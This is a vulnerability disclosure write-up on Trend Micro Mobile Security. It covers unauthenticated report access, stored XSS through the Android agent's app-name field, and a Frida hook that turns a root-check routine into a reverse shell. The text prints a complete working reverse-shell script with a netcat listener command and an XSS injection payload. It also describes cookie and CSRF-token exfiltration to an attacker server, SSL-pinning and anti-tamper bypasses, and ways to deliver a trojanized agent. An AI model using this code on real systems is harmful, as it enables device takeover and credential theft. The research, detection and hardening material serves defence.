Who Scans the Scanner? Exploiting Trend Micro Mobile Security
Abstract
Trend Micro Mobile Security (TMMS) is widely deployed to protect Android fleets. This research shows how an attacker can subvert that trust. We uncovered three Trend Micro Mobile Security vulnerabilities: (1) unauthenticated access to device security reports, exposing app inventories, scan histories, and policy status; (2) a persistent stored XSS injected via Android agent data that executes in the admin’s browser and enables session hijacking; and (3) memory-level manipulation of the Android agent’s scan routine that can be abused to run arbitrary code. We combined static reverse engineering with dynamic analysis (Frida), including SSL pinning and anti-tamper bypasses, to validate each finding and demonstrate a practical kill chain from information exposure and device compromise. Trend Micro confirmed two issues. We conclude that security tools must be scrutinized with the same rigor as any internet-facing system.
Impact TL;DR
An attacker can exploit three weaknesses to achieve a stealthy, repeatable takeover of both consoles and devices. First, unauthenticated report pages leak fleet-wide telemetry, allowing free reconnaissance to identify targets and timing. Next, device metadata that the agent forwards is rendered unescaped in those reports, so a crafted “appName” becomes stored XSS, steals an admin session, and hands over console APIs. With management-plane control, the attacker can distribute a trojanized/support build so the next Scan coerces the agent’s DeviceUtil.c path into a reverse shell, execution inside the security agent without noisy exploits.
Status: CVE request submitted to MITRE (tracking ID 1917906). IDs pending; this page will be updated when CVE(s) are reserved/assigned.
Research Motivation
We targeted TMMS because it sits at a high-leverage trust boundary in the mobile supply chain, where device agents, reporting pipelines, and the management console converge. Our goal was to test those boundaries like an adversary and map a repeatable kill chain, not chase a flashy bug. On a personal note, this work is a tribute to my mentor, Oliveira Lima, recognized in Trend Micro’s Hall of Fame. The spirit here is responsible disclosure and stronger defenses, not vendor bashing. With that intent, we combined static reverse engineering and live instrumentation to probe TMMS’s trust boundaries end-to-end. This lens mirrors APT tradecraft: compromise the trusted distribution point (here, a mobile security platform) and you inherit reach across the fleet.
Technical Introduction
As a cybersecurity researcher, I often ask: “Who scans the scanner?†Can the tools we trust for defense become our weakest links? That question drove this investigation into Trend Micro Mobile Security (TMMS), an enterprise-grade mobile security platform. Enterprises widely trust TMMS to enroll, manage, and secure employee Android devices. Because of that reach, a single flaw can have broad consequences. My motivation mixed curiosity with responsible skepticism: if attackers turn protection into a threat, what does the fallout look like?
To explore this, I scrutinized TMMS like any high-value target (both the Android device agent and the web management console), looking for weaknesses at its trust boundaries. This section sets the stage with a summary of the three vulnerabilities and their impact; the next sections dive into each one in detail.
| Vulnerability | Description | Impact |
|---|---|---|
| Unauthenticated Report Access | Security reports are publicly accessible without authentication. They expose scan histories, app inventories, OS versions, policy status, and other device data. | Confidentiality breach; enables external reconnaissance of an organization’s device fleet and security posture. |
| Persistent Stored XSS | Device-supplied fields (e.g., App Name) from the Android agent are rendered in reports without output encoding. The payload is stored server-side and executes when the report is viewed. | Admin session hijack and arbitrary actions in the console via authenticated APIs; staging point for further payloads (supply-chain pivot). |
| Memory Manipulation (Agent RCE) | During scans, the Android agent’s routine can be manipulated in memory (Frida) to alter function parameters/flow and trigger unintended behavior. | Potential code execution on the device running the agent (e.g., reverse shell/commands). Full device compromise; not confirmed by vendor. |
Each issue is severe on its own. Combined, they form an attack chain that turns a trusted security solution into an attack vector. Next, we explain how each vulnerability was discovered and how an attacker could exploit them step by step.
Scope & Testbed
Before touching a single line of code, I documented the stack under test so readers can reproduce results and so defenders can quickly judge exposure. The management console reported the following builds during the research window: “Management Server 9.8.0.3311″, “Mobile Device Agent” for “Android 9.8.1.3202”, and “Agent Installation Packages 9.8.1.3202“. The anti-malware engine and patterns are updated normally via the console’s Administration -> Updates panel.
Methodology
Our research followed a structured approach, blending reverse engineering and dynamic analysis techniques to peel back TMMS’s layers of defense. The process began with reconnaissance: we examined the TMMS web console for exposed endpoints and publicly accessible pages. This initial passive analysis led to the discovery of an unauthenticated report page, hinting at a larger security gap (Vulnerability 1). Next, we moved to reverse engineering the Android application (APK). Using tools like Jadx and ApkTool, we decompiled the TMMS enterprise agent to study its code, focusing on components handling device data and scanning routines.
Dynamic analysis was conducted in a controlled environment with an instrumented Android device. We employed Frida, a dynamic instrumentation toolkit, to hook into the running TMMS agent process. This allowed us to intercept and modify function calls at runtime. Early on, we encountered client-side defenses. TMMS employs SSL/TLS certificate pinning and runtime hardening (specifically anti-tamper). In our lab environment, we bypassed pinning by dynamically hooking the verification path (so the agent would accept our proxy certificate) and, where needed, applied smali-level static patches. This allowed us to observe agent-to-server HTTPS requests. We also neutralized tamper checks so the app would run on a modified APK. These steps were limited to analysis and did not constitute part of the exploitation chain. These bypasses of client-side controls, SSL pinning, and anti-tamper protections were crucial for a full dynamic analysis.
With those obstacles removed, we instrumented the agent and traced the agent requests to the console page. After, we confirmed that device-supplied metadata (appName) is persisted server-side and later rendered without proper output encoding. We then enrolled a test device and changed the parameter value to an application whose name yielded a persistent stored XSS (Vulnerability 2). In our controlled PoC, the payload could read the admin session and invoke authenticated console APIs. Because these reports are served under the same unauthenticated paths highlighted in Vulnerability 1, the trigger bar is extremely low. In parallel, by modifying in-memory parameters during the scan routine, we demonstrated a memory-level manipulation path in the Android agent (Vulnerability 3). Throughout the study, we iterated between static analysis and live instrumentation. This hybrid approach (from initial recon to reverse engineering to runtime manipulation) surfaced all three vulnerabilities. The sections below detail each finding, the challenges encountered, and the evidence gathered.
Bypassing Client-Side Controls: SSL Pinning and Signature Check
Before we dive into the vulnerabilities, we need to talk about client-side controls. Out of the box, the TMMS Android agent is intentionally opaque: TLS pinning prevents traffic inspection, and a self-signature check kills the process as soon as the APK has been modified. To study the reporting pipeline, fuzz scan flows, and demonstrate impact end-to-end, I first peeled those layers back strictly with binary patching, decompiling to smali, changing tiny decision points, rebuilding, and re-signing a lab build. This gives a stable, repeatable test artifact that survives process restarts, recording sessions, and long runs.
I began with the self-integrity gate. Static analysis in JADX led to “com.trendmicro.tmmssuite.enterprise.util.Utils”, where a compact routine that reads the app’s signing certificate via PackageManager, normalizes the fingerprint, and compares it to a hard-coded value. In the lab build, I replaced the comparison branch with a constant boolean. Functionally, it reduces to: return true, always. The rest of the startup proceeds unmodified, which preserves the agent’s behavior while allowing an instrumented, re-signed APK to run.
Right below it, I added a single-line patch to the companion method to short-circuit the check. After rebuilding and re-signing, the agent no longer exists when it detects my test key, perfect for controlled analysis without changing feature code.
With the anti-tamper barrier out of the way, I addressed TLS pinning purely in the binary. Under the Trend Micro namespaces, multiple components participate in TLS decisions, “HostnameVerifier#verify, X509TrustManager#checkServerTrusted / #checkClientTrusted”, and related paths (including Wi-Fi security and HTTP executors). Each of those tiny guards was modified at the smali level to accept my lab CA and to return without throwing. After a clean rebuild, the agent spoke HTTPS through my proxy while remaining functionally identical from the UI’s point of view.
It’s worth noting that TMMS performs other posture checks besides pinning and self-signature: root detection, USB debugging, Developer Options, mock locations, and emulator heuristics. In the default policy, they raise warnings rather than hard-block execution, but they can still affect compliance or gate features. The same binary-patching approach applies: find the small helpers that compute those booleans and replace them with constant returns for a reproducible laboratory build. With a minimal understanding of the call graph, these controls can be neutralized as predictably as the signature and TLS checks above, strictly for analysis, never for production use.
With these client-side gates safely relaxed in a test build, traffic became observable, the agent stayed stable across restarts, and I could capture the exact requests sent during scans, mutate device-supplied fields, and validate the exploit chain you’ll see next. Everything that follows (the report leakage, the stored XSS, and the scan-time code execution) sits on top of this foundation of precise, minimal binary patches crafted to study the client without altering its higher-level logic.
Vulnerability 1: Unauthenticated Access to Security Reports
I began with a legitimate admin session to understand how reporting worked. From the Report Management page at “/mdm/web/notificationReports/report.htm”, the console lets me generate on-demand reports and view their results. While mapping that flow, I noticed that the “View†actions resolved to static HTML artifacts under “mdm/web/repository/report/manual/output/”.
At this point, I dropped my session, switched to a clean browser profile (no cookies), and requested those same URLs directly. They loaded without any authentication challenge. In other words, the report outputs themselves were published as static files outside the normal session checks. The effect is public read-access to administrator-grade telemetry about the fleet. These report outputs render dashboard charts (e.g., bar and pie charts) such as Top 10 Installed Applications, Top 10 Blocked Websites, and platform-specific scan and compliance summaries. Because the artifacts are served as static HTML, these charts load without an authenticated session and preserve drill-down links, which significantly increases the reconnaissance value of the leak.
Below are representative outputs and the kind of information each one exposes:
| Report URL (static output) | Examples of exposed content |
|---|---|
| /mdm/web/repository/report/manual/output/Security_Scan_Report.htm | Android Application Scan Summary, iOS Application Scan Summary, Android Network Protection Summary, iOS Network Protection Summary, Android/iOS Device Vulnerability Summary, Top 10 Blocked Websites. |
| /mdm/web/repository/report/manual/output/Devices_Inventory_Report.htm | Device Groups, Device Statuses, Health, Policy Update, Application Control, Encryption, iOS Jailbreaking and Android Rooting, Device Registration Status, Operating System Summary, Android Versions, iOS Versions, Vendors, Telecommunications Carriers, Inactivity Reasons. |
| /mdm/web/repository/report/manual/output/Compliance_Violation_Report.htm | Groupings of non-compliant devices by policy failures (root/jailbreak, control/agent posture, encryption, etc.). |
| /mdm/web/repository/report/manual/output/Devices_Enrollment_Report.htm | Enrollment timeline and distribution across groups and platforms, indicating where and when devices enter the fleet. |
| /mdm/web/repository/report/manual/output/Application_Inventory_Report.htm | Top 10 Installed Applications (Android/iOS), often including internal app names and versions tied to specific business units. |
| /mdm/web/repository/report/manual/output/Devices_Unenrollment_Report.htm | Unenrollment events with timestamps and reasons, which can reveal off-boarding patterns. |
From an attacker’s perspective, this is turnkey reconnaissance: by pivoting across those pages, an unauthenticated visitor can reconstruct OS coverage and lag, policy posture and failures, app inventories, recent detections, and enrollment/unenrollment dynamics (enough to profile high-value users and plan precision attacks).
The root cause is architectural rather than a single broken check. The web tier serves report artifacts as static HTML behind generic routing, effectively without application-level authorization. The management UI acts as a thin convenience layer; once a URL is known (or guessed), fetching the artifact is just an unauthenticated GET. We validated this repeatedly in an incognito profile and across multiple report types.
Critically, the exposure is not just a confidentiality failure; it sets up the trigger for Vulnerability 2. The same report pages render device-originated fields (the parameter “appName” collected by the agent) and, because that content is stored server-side and returned without output encoding, a string like ><script>…</script> remains intact and executes on view. In our PoC, simply opening the report in an administrator’s browser fired the payload, yielding a persistent stored XSS (Vulnerability 2) and turning the leaked report into a delivery surface for code execution.
We reported the issue to the vendor. Regardless of whether the console is internet-exposed or “internal only,†publishing report artifacts outside the authentication flow breaks the basic trust model of a security dashboard. The fix is straightforward in principle (enforce authorization on the output paths or serve reports through authenticated controllers only), with short-lived, hard-to-guess URLs at minimum, but until that control exists, the page designed to help defenders becomes an intelligence feed for adversaries.
Vulnerability 2: Persistent Stored XSS via the Android Agent
After bypassing TLS pinning to observe traffic, we watched the Android agent enumerate installed applications and once the data-flow was mapped, the next step was to see whether any device-supplied fields were later rendered by the console. During a regular Device Sync, the Android agent posts its application inventory to the server at:
POST /officescan/PLS_TMMS_CGI/cgiosmaUpload.dll Content-Type: application/json
Inside the body, the application list is carried under “UpdateAppInformationRequest.Add[]”. We modified the field path “UpdateAppInformationRequest.Add[i].AppName” to include a benign script token and let the device sync normally:
{
"UpdateAppInformationRequest": {
"Add": [
{
"PackageName": "io.hakaisecondary.beerus",
"AppName": "><script></script>",
"Version": "1.0.0"
}
]
}
}
To confirm persistence, I opened Devices -> Devices Management and drilled into the test handset. The Installed Applications grid reflected the tampered names exactly as reported by the device, proving the value had been written to the management datastore and was reachable by the web tier. Some console views displayed the raw tag characters as text; the important observation is that the string survived transit unchanged and would later be reused in reporting templates.
GET /mdm/web/devices/DevicesManagement.htm
The real break happened in the Reports workflow. On the report page located at “/mdm/web/notificationReports/report.htm” I generated the Application Inventory Report. TMMS wrote the output to the static repository path
“/mdm/web/repository/report/manual/output/Application_Inventory_Report.htm”. This report template renders the application name field directly into the page without output encoding, and, compounding Vulnerability 1 the report URLs were accessible without authentication.
GET /mdm/web/notificationReports/report.htm
Opening the generated report we execute the stored payload in the browser context. The proof is the modal alert sourced from the console’s IP while the page path is “…/Application_Inventory_Report.htm”. Because the JavaScript runs in the user’s origin, it can read the session, call internal console APIs, and import additional scripts, turning a device-originated metadata field into console-side code execution. With the report endpoint exposed publicly (Vulnerability 1), even non-authenticated visitors can be led to the trigger page.
GET /mdm/web/repository/report/manual/output/Application_Inventory_Report.htm
executes the stored script immediately, proof that the server stores device data and returns it without output encoding in a page that’s also unauthenticated (see Vulnerability 1). As soon as a user (especially an admin) views the report, the payload runs in their browser context, yielding a persistent stored XSS.
Because the XSS is stored server-side and the report endpoints are publicly reachable, the trigger threshold is extremely low. In our PoC, simply opening the report executed attacker-controlled JavaScript, which can read the active admin session and invoke authenticated console APIs (e.g., pushing configurations, creating a rogue admin, or pulling additional device data), or bootstrap further payloads from a controlled origin.
| Stage | Endpoint | Entrypoint |
|---|---|---|
| Agent -> Server (ingest) | POST /officescan/PLS_TMMS_CGI/cgiosmaUpload.dll () | UpdateAppInformationRequest.Add[].AppName |
| Server -> Console (UI render) | GET /mdm/web/devices/DevicesManagement.htm | AppName |
In sum, the ingest–render–report path turns a routine inventory field into code that runs in a user’s browser on view. Because the report artifacts reside under the unauthenticated “/mdm/web/repository/report/manual/output/” tree, viewing is the only trigger; no special click or crafted URL parameters are required. Once executed, the script inherits the user’s ambient session and can read state or invoke console APIs to create users, push policies, or stage secondary payloads.
From Stored XSS to Console Takeover
The stored payload isn’t the goal, it’s the transport. After proving that device-supplied metadata is rendered verbatim in Application Inventory Report and related views, I weaponized the same field to load a hosted script and pivot from “proof†to “post-exploitation”. The seeding step happens on the device -> server ingestion path: the Android agent forwards app metadata to “/officescan/PLS_TMMS_CGI/cgiosmaUpload.dll”. By setting the application name to an HTML <script> tag that points at my server (e.g., https://IP-ADDRESS/luriel_v2.js), the console later includes that script when an user opens the report. Nothing exotic,just using the product’s own pipeline as the loader.
Once the report is viewed, the browser executes my script with the admin’s origin and session. The script does three things in sequence. First, it harvests state the console already holds: document.cookie to recover the TMMStoken, and localStorage.wf_CSRF_token when present. That value is the console’s CSRF nonce persisted by the UI; some POST endpoints require it alongside the session cookie, so capturing it lets the script forge same-site requests that survive server-side CSRF validation. If the token isn’t set for a given view, the script falls back to cookie-only calls that the console still accepts. Second, it proves reach and privilege by invoking a JSON endpoint, the console uses “/mdm/cgi/web_service.dll” with a well-formed body (tmms_action: “get_authentication_method”) and the same headers the app sends (Content-Type: application/json, X-Requested-With: XMLHttpRequest, X-Tmmstoken: <token>). Third, it exfiltrates everything to my HTTPS listener as JSON. Because modern browsers preflight cross-origin POSTs, my listener implements CORS for OPTIONS and mirrors permissive “Access-Control-Allow-*” headers, so the POST succeeds without tripping the browser.
The companion Python server is a tiny TLS endpoint that listens on 443 and accepts the browser’s CORS preflight; its OPTIONS handler returns permissive “Access-Control-Allow-*” headers so the POST from the injected script isn’t blocked. The POST path “/log” reads the request body using the announced “Content-Length”, then attempts to JSON-decode it; if parsing fails, it dumps the raw UTF-8 so nothing is lost. Running under HTTPS with a self-signed cert.pem/key.pem avoids mixed-content errors in modern browsers and keeps credential material off cleartext. Every payload (cookies, CSRF token, and any API response blob) is echoed to stdout for live triage and can be redirected to disk or a database for replay. In short, the JS turns the admin’s browser into a courier, and the Python service acts as the CORS-friendly collector that receives, normalizes, and safely stores what the browser delivers.
With that in place, opening Application_Inventory_Report.htm converts a benign dashboard click into a controlled data pump. The first wave delivers cookies, CSRF token, and the response blob from the authenticated API call, exactly the materials needed to replay API actions or mint operator-grade requests from outside the console. In my capture, the exfil contained “session_info“, the admin userID, the current deploy_mode, and a “preset_enroll_key“ (where configured), alongside the success response from “get_authentication_method”. From there, an attacker can step up to session hijack (cookie replay), authenticated API abuse (policy changes, package distribution), or quiet reconnaissance (enumerating devices and groups) without ever touching the login page.
Vulnerability 3: Memory Manipulation Leading to Remote Code Execution
The third finding began with a simple heuristic during reverse engineering: anything in the Android agent that spawns an OS process as part of normal posture checks is a natural pivot. In “com.trendmicro.android.base.util.DeviceUtil” I found a function whose name is “c()”, that probes for rooting by executing “which su”. Tracing the app while starting a Security Scan showed this method on the hot path; it is invoked during posture evaluation on ordinary user flows, which makes it both reachable and predictable.
// package: com.trendmicro.android.base.util
// class: DeviceUtil
// note: called during posture/scan paths
private static boolean c() {
Process process = null;
try {
process = Runtime.getRuntime().exec(new String[]{"/system/xbin/which", "su"});
boolean present =
new BufferedReader(new InputStreamReader(process.getInputStream()))
.readLine() != null;
if (process != null) process.destroy();
return present;
} catch (Throwable unused) {
if (process != null) process.destroy();
return false;
}
}
Now that the code path is clear in “DeviceUtil”, let’s move to exploitation. For the demonstration, I wrote a Frida script that hooks the “c(android.content.Context)” overload and instruments it at runtime, dynamically replacing its expected behavior with values under my control. Instead of merely probing for “su”, the hook spawns “/system/bin/sh”, opens a TCP socket to my listener, and bridges the shell’s I/O, then returns a “java.lang.String” so the scan flow continues uninterrupted. Let’s see how it’s done.
const Socket = Java.use('java.net.Socket');
const OutputStream = Java.use('java.io.OutputStream');
const InputStream = Java.use('java.io.InputStream');
const ProcessBuilder = Java.use('java.lang.ProcessBuilder');
const StringBuilder = Java.use('java.lang.StringBuilder');
const Thread = Java.use('java.lang.Thread');
const ArrayList = Java.use('java.util.ArrayList');
// Change these to match your netcat listener
const host = 'IP-ADDRESS'; // Replace with your IP address
const port = PORT; // Replace with your port number
var DeviceUtil = Java.use('com.trendmicro.android.base.util.DeviceUtil');
// Specify the overload with Context parameter
var c_overload = DeviceUtil.c.overload('android.content.Context');
c_overload.implementation = function(context) {
console.log("[*] DeviceUtil.c(Context) called with context: " + context);
// Start the reverse shell
try {
var arr = Java.array('java.lang.String', ['/system/bin/sh']);
var p = ProcessBuilder.$new.overload('[Ljava.lang.String;')
.call(ProcessBuilder, arr)
.redirectErrorStream(true)
.start();
var s = Socket.$new.overload('java.lang.String', 'int').call(Socket, host, port);
var pi = p.getInputStream();
var pe = p.getErrorStream();
var si = s.getInputStream();
var po = p.getOutputStream();
var so = s.getOutputStream();
while (!s.isClosed()) {
while (pi.available() > 0) {
so.write(pi.read());
}
while (pe.available() > 0) {
so.write(pe.read());
}
while (si.available() > 0) {
po.write(si.read());
}
so.flush();
po.flush();
Thread.sleep(50);
try {
p.exitValue();
break;
} catch (e) {
// ignore
}
}
p.destroy();
s.close();
// Return a Java string as expected by the original method
return Java.use('java.lang.String').$new("Command Executed");
} catch (e) {
console.log("[*] Error: " + e.message);
// Return an error string as expected by the original method
return Java.use('java.lang.String').$new("Command Execution Failed");
}
};
The hook you see in the above code replaces the c(android.content.Context) overload at runtime. The script begins by binding the agent’s own Java classes so every call is resolved in the correct class loader: “java.net.Socket” for the TCP, “java.io.InputStream” and “java.io.OutputStream” for byte movement, “java.lang.ProcessBuilder” to launch a child process, “java.lang.StringBuilder” for incidental buffers, “java.lang.Thread” for a tiny yield, and “java.util.ArrayList” because the original PoC imported it alongside the others. It then requests the exact signature “DeviceUtil.c(‘android.content.Context’)”, so the replacement matches the original ABI and return type.
The implementation opens with a log line that includes the concrete “Context” instance and immediately constructs a real Java “String[]” using “Java.array(‘java.lang.String’, [‘/system/bin/sh’])”. That conversion really matters; ART will not accept a JavaScript array in place of “[Ljava.lang.String;”. With the array in hand, the code calls the “ProcessBuilder(String[])” constructor via Frida’s overload resolver, sets “redirectErrorStream(true)” so stderr is folded into stdout, and launches the process with “start()”. At that moment “/system/bin/sh” is running inside the agent’s process, under the agent’s UID, with the agent’s network and filesystem privileges.
A TCP client socket is then created with the two-argument constructor “Socket(String host, int port)”. Our PoC uses a private lab address and port; the object model is the same regardless of target. With the shell process alive and the socket connected, the script captures five streams: from the child process it takes stdout via “getInputStream()” and stderr via “getErrorStream()”, and it keeps a writable handle to stdin via “getOutputStream()”; from the socket it reads with “getInputStream()” and writes with “getOutputStream()”. These are the only moving parts required to form a bidirectional bridge between the shell and the operator.
The bridge loop is single-threaded and minimalist by design. It tests “available()” on each input stream to avoid blocking, drains whatever bytes are present from the shell’s stdout and stderr into the socket’s output, and drains whatever bytes arrive from the socket into the shell’s stdin. It flushes both sides so keystrokes and responses feel interactive rather than buffered. A short “Thread.sleep(50)” yields to the scheduler so the hook doesn’t spin at 100% CPU, and a probe of “p.exitValue()” provides a clean exit; that call throws while the child is alive and only returns once the shell has terminated. When either side closes, the script destroys the child and closes the socket explicitly to avoid leaking descriptors across subsequent scans. The last line returns a real “java.lang.String” (for example, Command Executed), so the caller’s contract is satisfied, and the UI continues into the result panel without complaint. If any exception bubbles up, an error message is logged, and another “java.lang.String” is returned to preserve type safety.
When the scan runs, the effect is immediate and quiet. The moment the posture phase hits “c(Context)”, the listener receives an interactive session from the device. Shell commands will resolve inside the TMMS agent’s sandbox; on screen, “Security Scan Result” renders as usual (the normal UI on the device and a live shell under the app’s UID at the operator) is the point of the technique: coercion of a legitimate process spawn on a routine path rather than a crash-and-burn exploit.
Make sure the TCP listener is already running before getting a Scan. The hook dials out from the device to the “host:port” one you set in the script and immediately bridges the socket to “/system/bin/sh”. With the listener up “nc -lvnp 1337“, the connection is accepted, and you can type commands at the listener; they’re written to the shell’s stdin, and the shell’s stdout/stderr are streamed back to you. If the listener isn’t running (or you close it), the socket breaks, the bridge loop tears down, and the method returns to the app.
Below is a short demo video of the exploit running against the app’s Scan feature. As the scan kicks off, the Frida hook on “DeviceUtil.c(Context)” fires, spawns “/system/bin/sh”, and the reverse shell connects back to my listener, while the UI proceeds as if nothing unusual happened.
Beyond the lab hook, the natural question is: how would a real adversary light this up without Frida on a tethered device? The most direct path is a trojanized TMMS build (repacked with a Frida Gadget or lightweight loader) shipped as a “routine security update†through side-loading channels common in enterprise fleets. A close second is abusing the management plane: leverage the stored-XSS console compromise to steal an admin session, then use the console’s software-distribution or policy features to push a modified agent or auxiliary “support†APK that auto-triggers during scans. On devices already under partial control (stolen, jailbroken/rooted test phones, or handsets with developer options enabled), an operator can load Magisk/Xposed/LSPosed modules or a small native library shim to inject the same hook at boot, without requiring user taps. Supply-chain angles also exist: seed a tainted agent into pre-enrollment images, vendor app catalogs, or internal EMM stores, so the payload arrives with corporate branding and expected signatures. Suppose the agent exposes exported services, broadcast receivers, or uses dynamic class loading (DexClassLoader). In that case, those surfaces should be reviewed as potential code-loading pivots that can be driven by a companion app rather than on-device tooling.
Full Impact Analysis
Up to this point, we walked through how the console leaks intelligence (Vulnerability 1), how device-supplied metadata poisons the UI (Vulnerability 2), and how a scan-time helper can be coerced into a shell (Vulnerability 3). The impact is best understood as a single operator’s storyline, how an APT or a disciplined red team would chain these seams into a durable, low-noise foothold.
It starts with reconnaissance, not exploitation. The unauthenticated report endpoints under “/mdm/web/repository/report/manual/output/“, for example, “Security_Scan_Report.htm”, “Devices_Inventory_Report.htm”, and “Application_Inventory_Report.htm” generated from “/mdm/web/notificationReports/report.htm” expose fleet-level telemetry with no session. That data includes “Top-10†dashboard data of OS versions, app inventories, compliance state, last scan times, and carrier information. For an adversary, this is free target selection: pick high-value groups, map patch gaps, learn which devices run sensitive apps, and time the next move to the organization’s scan cadence.
Weaponization then happens inside the vendor’s trust boundary. Because the Android agent forwards device metadata through “/officescan/PLS_TMMS_CGI/cgiosmaUpload.dll” , and the console later renders it without output encoding, a crafted value, such as an application, “appName” becomes stored code in the admin’s browser. One click on “Application_Inventory_Report.htm” is enough to execute attacker-controlled JavaScript, read the console session, and pivot to authenticated console APIs. At that point, an operator isn’t just viewing the dashboard; they are the dashboard.
Control of the management plane turns telemetry into a distribution channel. With an admin’s cookies and API reach, an APT can push a “support†APK, alter policy, or stage a trojanized agent build (common in fleets that sideload or use internal EMM stores). The next scheduled Scan becomes the delivery trigger. When the agent reaches “DeviceUtil.c(android.content.Context)” during posture checks, the runtime is already under the operator’s influence; the same hook demonstrated in the lab fires on-device, opening an interactive session inside the agent’s process while the UI proceeds normally. This is not memory corruption, it’s coercion of a legitimate process spawned on a routine path, which makes it operationally quiet.
From that vantage point, impact compounds quickly. The shell inherits the agent’s sandbox identity, network allow-listing, and visibility of local state. Adversaries can poison outbound telemetry (hide findings, fabricate “clean†results), exfiltrate via whitelisted endpoints that defenders expect to see, and speak on SSL-pinned channels as the app. Policy artifacts, enrollment tokens, VPN profiles, and cached reports become loot; where deployments permit it, operators can drive silent install/uninstall or enforced updates. The console’s trust in the agent’s truth is the blast multiplier: once the truth is malleable, incident responders are flying blind.
For APT tradecraft, the playbook writes itself. It could use the console compromise (Vulnerability 2) as the distribution lever, land instrumentation across a segment of the fleet, and let scheduled Scans supply periodic C2 beacons (Vulnerability 3). Blend actions into expected patterns (scan timings, report fetches, policy syncs) so dwell time stretches. On already-compromised or stolen devices, the agent-level foothold becomes a post-exploitation kit to keep control without rooting. Social angles add pressure: a scripted console can present brand-consistent compliance prompts to phish MFA or VPN secrets, or push a “company security update†that is, in reality, the payload.
For red teams, the same chain is a high-fidelity exercise in defender deception, demonstrating that a trusted mobile security stack can be turned against itself. It measures SOC visibility when telemetry is falsified at the source and validates controls around software distribution and device attestation.
Trend Micro confirmed the report exposure and the stored XSS; their stance on the scan-time runtime coercion was that behavior requiring a modified environment falls outside the standard Play channel. That may hold for consumers, but it does not neutralize enterprise reality: sideloaded agents, internal app catalogs, debug/test devices, and admin-driven distribution exist. In those environments, the chain above is both practical and repeatable.
Net effect: confidentiality is compromised at the reconnaissance scale (Vulnerability 1), integrity is subverted at the management plane (Vulnerability 2), and control is gained at the endpoint, within the very agent meant to defend it (Vulnerability 3). In aggregate, the finding challenges an industry assumption that security tooling is a one-way asset. Here, the tooling became the supply-chain pivot, the C2 trigger, and the camouflage. Composite severity, the flaws in TMMS allowed for a compromised chain. Organizations using TMMS (or any similar solution) should recognize that their security console is as important to protect as their crown jewel servers. If an attacker holds the keys to your security dashboard, they hold the keys to your kingdom.
Detection & Hardening for TMMS Admins
We’ve just shown how a determined operator can move from public report views -> console code execution via stored XSS -> runtime control inside the Android agent. The story below keeps the same outside-in cadence as the attack, but every control is in your hands as a platform owner or admin.
Lock down where reports live and who can reach them. Treat the report repository as Tier-0 data, not a “convenience exportâ€. Keep the TMMS web tier off the public Internet; front it with a VPN or a zero-trust gateway, and restrict access to named admin groups and fixed source networks. At the edge, explicitly block direct access to the report output paths except from the console UI itself. If your reverse proxy supports it, inject defensive headers “Content-Security-Policy, X-Content-Type-Options, X-Frame-Options, Referrer-Policy”. This is all doable without any product change.
Make the management plane a place attackers can’t casually stand. Put the console on an internal segment with a private hostname; guard it with SSO + MFA and network-level ACLs. Give admins individual accounts (no shared roots), short session lifetimes, and break-glass credentials stored offline. Separate duties so the person who can push software/policies is not the same person who can approve them. Build a change window: any mass action (e.g., “Send†reports, deploy a new agent) requires a ticket ID and two approvals.
Watch for the exact footsteps this chain leaves. Ship web and app logs to your SIEM and write detections aligned with the findings:
- Any hit to “/repository/report/manual/output/*.htm” from a non-admin source or outside business hours.
- Report views whose referrer is an external email or chat (classic phish bait).
- Device metadata that suddenly contains HTML/script tokens (e.g., “appName” including “<“ or “>”).
- Spikes in “View/Send†actions or policy pushes by a single admin.
- Devices that contact unfamiliar IPs during scan windows (when our hook would dial out).
Operate the Android fleet to deny easy delivery. Enforce Managed Google Play for agent installs; block Unknown Sources and sideloading in production. Pin the vendor’s signing certificate in your EMM policy so a repackaged “company security update†can’t be enrolled. Disable Developer Options and USB debugging; require hardware-backed attestation/Play Integrity for enrollment and on each compliance check. Keep OS patches current and quarantine devices that fail attestation or run untrusted builds. These are standard EMM controls you can turn on now.
Assume compromise and plan the first ten minutes. If your SOC sees the IOCs above, have a pre-approved playbook: expire all console sessions; temporarily block report output paths at the reverse proxy; rotate admin passwords/keys; reissue an agent enrollment token; isolate suspected devices; and re-generate reports after cleanup. Search server logs for uploads to the app-inventory endpoint with suspicious names and for unauthenticated reads of report pages. This keeps an incident bounded to hours, not days.
Drill the chain as a purple-team exercise. Don’t just pentest the app; rehearse the whole story. Start with an external surface scan to confirm the console and report paths are off-Internet. Simulate a malicious app name flowing into a test console and verify your proxy headers and SIEM rules catch it. Tabletop a mass policy push and require dual approval to proceed. Finally, on an isolated lab device, run a controlled scan during which your network team validates that egress filters catch unexpected callbacks. Document gaps and turn them into tickets, then rerun the drill quarterly.
Treat TMMS as Tier-0 infrastructure. Backups, OS hardening, and patch SLAs for the TMMS host should match your domain controllers and IdP. Patch immediately when updates ship; the hours after a CVE drops are when copy-paste exploits hit the wild. Keep the console behind named networks, keep admins on SSO + MFA, keep devices on managed distribution, and keep testing that those controls actually work.
If you adopt the posture above, the same kill chain that was viable in our lab becomes brittle in your environment: the report surface isn’t reachable from the outside, the console can’t be driven through a browser trick, and scans don’t occur on devices that allow opportunistic instrumentation or sideloaded agents. That’s how you run a security platform as if an APT is already looking for its weak seams, because they are.
Responsible Disclosure
As soon as the findings were repeatable end-to-end, I moved the work out of the lab and into a responsible disclosure track with Trend Micro. The goal was simple: give the vendor enough technical depth to reproduce each issue without publishing weaponized detail, keep communication tight and verifiable, and provide a clear path from report to fix to public learning.
The first message summarized the vulnerabilities, attached the proof-of-impact artifacts, and anchored the report to concrete URLs inside the TMMS console. That initial note kicked off a thread where I answered follow-up questions, sent sanitized videos, and shared PoCs. Over the weeks that followed, Trend Micro acknowledged the XSS and information disclosure. For the command-execution research on the Android agent, the Trend Micro team clarified their position, stating that behavior requiring a modified environment (e.g., instrumentation or repackaged builds) is out of scope for Play-distributed users, while still being useful to discuss for enterprise deployments and red-team simulations. The disclosure process concluded positively: the case was tracked internally by Trend Micro, and my work was acknowledged in their public statements.
<figcaptionclass=”wp-element-caption”>Trend Micro – Acknowledgment page for 2025, highlighting the inclusion of Lucas Luriel Carmo (Hakai Security).Vendor stance on Vulnerability 3. In the email, the product team stated that behavior requiring rooting or a modified APK (e.g., Frida/gadget or repack) is out of scope for normal Google Play users. I agree that this reduces consumer risk; however, enterprise fleets often sideload agents or run debug/test builds, where this execution path becomes applicable to red-team and APT tradecraft.
I kept testing in an isolated lab, redacted customer identifiers, avoided targeting production systems, and limited public details to what defenders need (affected surfaces, conditions, and mitigations). Wherever a proof of concept could lead to immediate harm, I provided it privately to the vendor and withheld it here.
Disclosure Timeline
